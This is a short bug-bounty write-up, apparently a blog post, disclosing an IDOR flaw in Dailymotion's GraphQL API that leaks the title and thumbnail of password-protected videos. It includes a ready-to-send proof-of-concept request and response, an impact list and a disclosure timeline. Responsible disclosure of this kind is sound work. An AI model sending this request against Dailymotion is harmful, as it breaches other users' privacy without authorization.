Password-Protected Video Metadata Disclosure via IDOR in Dailymotion

I discovered an access control vulnerability in Dailymotion that allows an authenticated user without knowing a video password to view…

Abu Idris Al-Muhaqqiq

~2 min read · January 28, 2026 (Updated: January 28, 2026) · Free: Yes

Summary

I discovered an access control vulnerability in Dailymotion that allows an authenticated user without knowing a video password to view metadata (title and thumbnail) of password-protected videos. This can be achieved by abusing an IDOR (Insecure Direct Object Reference) issue in a GraphQL mutation that allows saving videos to a playlist.

Description

Dailymotion provides a feature that allows users to protect their videos with a password. Videos protected by a password are expected to remain fully private, including their metadata, unless the correct password is provided.

However, during security testing, I found that a password-protected video can still be added to a user-controlled playlist by directly referencing its VIDEO_ID via a GraphQL API request. This action does not require the video password and is processed successfully by the backend.

Once added to the playlist, the attacker can view the video title and thumbnail, leading to unauthorized disclosure of private content metadata.

Proof of Concept

Request

POST / HTTP/1.1
Host: graphql.api.dailymotion.com
Authorization: Bearer attacker_token
Content-Type: application/json

{
  "operationName":"ADD_COLLECTION_VIDEO_MUTATION",
  "variables":{
    "input":{
      "collectionId":"PLAYLIST_ID",
      "id":"VIDEO_ID"
    }
  },
  "query":"mutation ADD_COLLECTION_VIDEO_MUTATION($input: SaveInput!) {
    addSave(input: $input) {
      status
      __typename
    }
  }"
}

Response

HTTP/1.1 200 OK

{
  "data": {
    "addSave": {
      "status": "SUCCESS",
      "__typename": "SavePayload"
    }
  }
}

The SUCCESS status confirms that the backend allows the operation without validating whether the requester has authorization to access the password-protected video.

Impact

This vulnerability allows an attacker to:

Bypass access control on password-protected videos
Confirm the existence of private videos
Access sensitive metadata such as:
Video title
Video thumbnail

Although the video playback itself remains restricted, the exposure of metadata violates user privacy and contradicts the security guarantees of password-protected content.

Timeline

January 20, 2026: Submit Report January 20, 2026: Under Review January 26, 2026: Informative

#idor #idor-vulnerability #broken-access-control